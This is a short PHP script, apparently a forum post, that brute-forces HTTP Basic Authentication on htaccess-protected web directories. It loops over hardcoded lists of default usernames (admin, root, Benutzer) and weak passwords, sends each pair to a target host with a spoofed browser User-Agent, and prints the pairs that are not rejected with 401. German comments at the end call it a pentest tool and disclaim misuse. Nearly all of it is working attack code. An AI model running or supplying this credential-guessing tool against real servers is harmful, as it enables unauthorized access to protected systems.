[php]
<?php
error_reporting(0);
if (isset($argv[2]))
{
$domain = $argv[1];
$pfad = $argv[2];
$benlist = array("admin","administrator","Admin","Administrator","root","Benutzer","benutzer");
$passlist = array("","admin","1234","123456","12345678","abcdef","administrator","admin","Admin","root","Passwort","passwort","pass","password","Password");
for ($i=0; $i < (count($benlist)); $i++)
{
for ($y=0; $y < (count($passlist)); $y++)
{
$bla="";
socketget ($domain,$pfad,$benlist[$i],$passlist[$y]);
}
}
}
else
{
echo "\nsorry read the source ;)\n";
die();
}
function socketget($host, $pfad,$ben, $pass)
{
global $bla;
$pass2 = base64_encode($ben.":".$pass);
header("Content-type: text/plain");
$sock = fsockopen($host, 80);
fputs($sock, "GET ".$pfad." HTTP/1.1\r\n");
fputs($sock, "Host: ".$host."\r\n");
fputs($sock, "User-Agent: Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.20) Gecko/20110805 Ubuntu/10.04 (lucid) Firefox/3.6.20\r\n");
fputs($sock, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
fputs($sock, "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n");
fputs($sock, "Accept-Encoding: gzip,deflate\r\n");
fputs($sock, "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n");
fputs($sock, "Keep-Alive: 115\r\n");
fputs($sock, "DNT: 1\r\n");
fputs($sock, "Authorization: Basic ".$pass2."\r\n");
fputs($sock, "Connection: keep-alive\r\n\r\n");
while(!feof($sock))
$bla .= fgets($sock, 4096);
fclose($sock);
if (preg_match("/401 /",$bla))
{
echo ".";
}
else
{
echo $ben." ".$pass." Passwort passt\n";
}
}
// httaccess Security check
// Diese Anwendung wurde geschrieben, um Pentests auf htaccess geschuetzte Bereiche auszufuehren
// Dieses Script wurde nicht dazu geschrieben, unberechtigt in fremde abgesicherte Bereiche einzudringen
// und darf dazu auch nicht missbraucht werden
// damit "Kinder" keinen Unfug damit machen, gibt es KEINE Anleitung zu dem Script
// coded by hoohead
?>
[/php]
